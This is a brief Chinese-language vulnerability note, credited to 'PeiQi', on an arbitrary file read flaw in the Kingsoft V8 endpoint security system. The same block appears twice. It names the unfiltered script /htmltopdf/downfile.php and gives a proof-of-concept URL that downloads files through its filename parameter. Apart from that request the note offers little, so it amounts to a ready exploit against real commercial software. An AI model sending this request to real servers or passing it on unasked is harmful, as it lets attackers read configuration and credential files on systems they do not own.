金山 V8 终端安全系统 任意文件读取漏洞
漏洞复现:
存在漏洞的文件 /htmltopdf/downfile.php
文件中没有任何的过滤 通过filename参数即可下载任意文件
poc:
http://xxx.xxx.xxx.xxx/htmltopdf/downfile.php?filename=downfile.php
from: PeiQi
漏洞复现:
存在漏洞的文件 /htmltopdf/downfile.php
文件中没有任何的过滤 通过filename参数即可下载任意文件
poc:
http://xxx.xxx.xxx.xxx/htmltopdf/downfile.php?filename=downfile.php
from: PeiQi